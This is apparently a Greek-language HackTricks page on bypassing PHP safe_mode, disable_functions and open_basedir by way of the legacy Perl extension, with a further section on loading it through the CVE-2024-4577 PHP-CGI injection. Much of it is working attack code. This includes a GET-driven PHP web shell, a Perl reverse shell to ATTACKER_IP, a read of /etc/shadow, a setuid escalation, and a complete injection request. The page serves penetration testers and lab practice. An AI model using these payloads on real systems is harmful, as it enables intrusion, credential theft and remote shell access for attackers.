PHP Perl Extension Safe_mode Bypass Exploit

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Ιστορικό

Το πρόβλημα που καταγράφεται ως CVE-2007-4596 προέρχεται από την legacy perl PHP extension, η οποία ενσωματώνει έναν πλήρη Perl interpreter χωρίς να σέβεται τους ελέγχους safe_mode, disable_functions, ή open_basedir του PHP. Οποιοσδήποτε PHP worker φορτώνει extension=perl.so αποκτά απεριόριστο Perl eval, οπότε η εκτέλεση εντολών παραμένει απλή ακόμα κι αν όλα τα κλασικά PHP process-spawning primitives έχουν αποκλειστεί. Παρόλο που το safe_mode εξαφανίστηκε στο PHP 5.4, πολλά παλιά shared-hosting stacks και ευάλωτα labs το περιλαμβάνουν ακόμη, επομένως αυτό το bypass είναι ακόμα χρήσιμο όταν προσγειωθείτε σε legacy control panels.

Συμβατότητα & Κατάσταση Πακεταρίσματος (2025)

• Το τελευταίο PECL release (perl-1.0.1, 2013) στοχεύει PHP ≥5.0· το PHP 8+ γενικά αποτυγχάνει επειδή άλλαξαν τα Zend APIs.
• Το PECL αντικαθίσταται από το PIE, αλλά παλαιότερα stacks εξακολουθούν να περιλαμβάνουν PECL/pear. Χρησιμοποιήστε τη ροή παρακάτω σε στόχους PHP 5/7· σε νεότερο PHP αναμένετε να κάνετε downgrade ή να μεταβείτε σε άλλο injection path (π.χ., userland FFI).

Δημιουργία Περιβάλλοντος Δοκιμής το 2025

• Κατεβάστε το perl-1.0.1 από το PECL, μεταγλωττίστε το για την έκδοση/κλάδο του PHP που σκοπεύετε να στοχεύσετε, και φορτώστε το παγκοσμίως (php.ini) ή μέσω dl() (αν επιτρέπεται).
• Γρήγορη συνταγή lab βασισμένη σε Debian:

sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2

• Κατά την εκμετάλλευση επιβεβαιώστε τη διαθεσιμότητα με var_dump(extension_loaded('perl')); ή print_r(get_loaded_extensions());. Αν απουσιάζει, αναζητήστε το perl.so ή καταχραστείτε εγγράψιμες καταχωρήσεις php.ini/.user.ini για να το φορτώσετε με το ζόρι.
• Εφόσον ο interpreter ζει μέσα στον PHP worker, δεν χρειάζονται εξωτερικά binaries — τα φίλτρα network egress ή οι μαύρες λίστες proc_open δεν έχουν σημασία.

Αλυσίδα build στο host όταν το phpize είναι προσβάσιμο

Αν το phpize και το build-essential υπάρχουν στον συμβιβασμένο host, μπορείτε να μεταγλωττίσετε και να ρίξετε το perl.so χωρίς να κάνετε shell out στο OS:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Αν το open_basedir επιβάλλεται, βεβαιωθείτε ότι τα τοποθετημένα .user.ini και .so βρίσκονται σε επιτρεπόμενη διαδρομή; η οδηγία extension= εξακολουθεί να εφαρμόζεται εντός του basedir. Η ροή μεταγλώττισης αντικατοπτρίζει το εγχειρίδιο PHP για τη δημιουργία PECL extensions.

Αρχικό PoC (NetJackal)

Από http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, ακόμα χρήσιμο για να επιβεβαιώσετε ότι η επέκταση ανταποκρίνεται στο eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Σύγχρονες Βελτιώσεις Payload

1. Πλήρες TTY μέσω TCP

Ο ενσωματωμένος διερμηνέας μπορεί να φορτώσει IO::Socket ακόμα και αν το /usr/bin/perl είναι μπλοκαρισμένο:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Απόδραση από το σύστημα αρχείων ακόμα και με open_basedir

Το Perl αγνοεί το open_basedir του PHP, οπότε μπορείτε να διαβάσετε οποιαδήποτε αρχεία:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Κατεύθυνε την έξοδο μέσω IO::Socket::INET ή Net::HTTP για να exfiltrate δεδομένα χωρίς να αγγίξεις τους descriptors που διαχειρίζεται το PHP.

3. Inline Compilation for Privilege Escalation

Εάν το Inline::C υπάρχει σε επίπεδο συστήματος, μεταγλώττισε βοηθητικά μέσα στο αίτημα χωρίς να βασίζεσαι στο ffi ή pcntl του PHP:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Θεώρησε το Perl ως εργαλειοθήκη LOLBAS — π.χ. dump MySQL DSNs ακόμη και αν λείπει το mysqli:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Κατάχρηση: Φόρτωση perl.so μέσω PHP-CGI Argument Injection (CVE-2024-4577)

Σε εγκαταστάσεις Windows που εξακολουθούν να εκθέτουν PHP-CGI, η ευπάθεια argument-injection του 2024 (CVE-2024-4577) σας επιτρέπει να περάσετε αυθαίρετες επιλογές -d στον διερμηνέα. Αυτό σημαίνει ότι μπορείτε να φορτώσετε την επέκταση Perl ακόμη και όταν dl() είναι απενεργοποιημένο και το php.ini είναι μόνο προς ανάγνωση:

• Δημιουργήστε ή ανεβάστε ένα συμβατό perl.dll/perl.so σε μια διαδρομή εγγράψιμη από τον web server (π.χ., C:\xampp\htdocs\temp\perl.dll).
• Στείλτε ένα μόνο HTTP request που εγχέει -d extension=C:\\xampp\\htdocs\\temp\\perl.dll και, στο ίδιο σώμα του αιτήματος, ένα payload που υποστηρίζεται από Perl:

POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Επειδή ο PHP worker τώρα ενσωματώνει Perl πριν διαβάσει το body, όλα τα κλασικά disable_functions/open_basedir controls παρακάμπτονται. Αυτό λειτουργεί σε ευάλωτες στοίβες Windows/CGI μέχρι να γίνει patch (PHP 8.1.29/8.2.20/8.3.8 και νεότερες εκδόσεις κλείνουν τη regression). Αν το open_basedir μπλοκάρει τη διαδρομή του DLL, αποθέστε πρώτα το αρχείο μέσα στον επιτρεπόμενο base dir ή αξιοποιήστε μια υπάρχουσα world-readable διαδρομή DLL που συνοδεύει το XAMPP.

Αναφορές

• CVE-2007-4596 summary and timeline
• PECL perl extension package information
• PHP Manual: building PECL extensions with phpize
• PECL homepage announcing PIE replacement
• CVE-2024-4577 PHP-CGI argument injection PoC
• Plesk advisory summarizing CVE-2024-4577 impact and patched versions

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.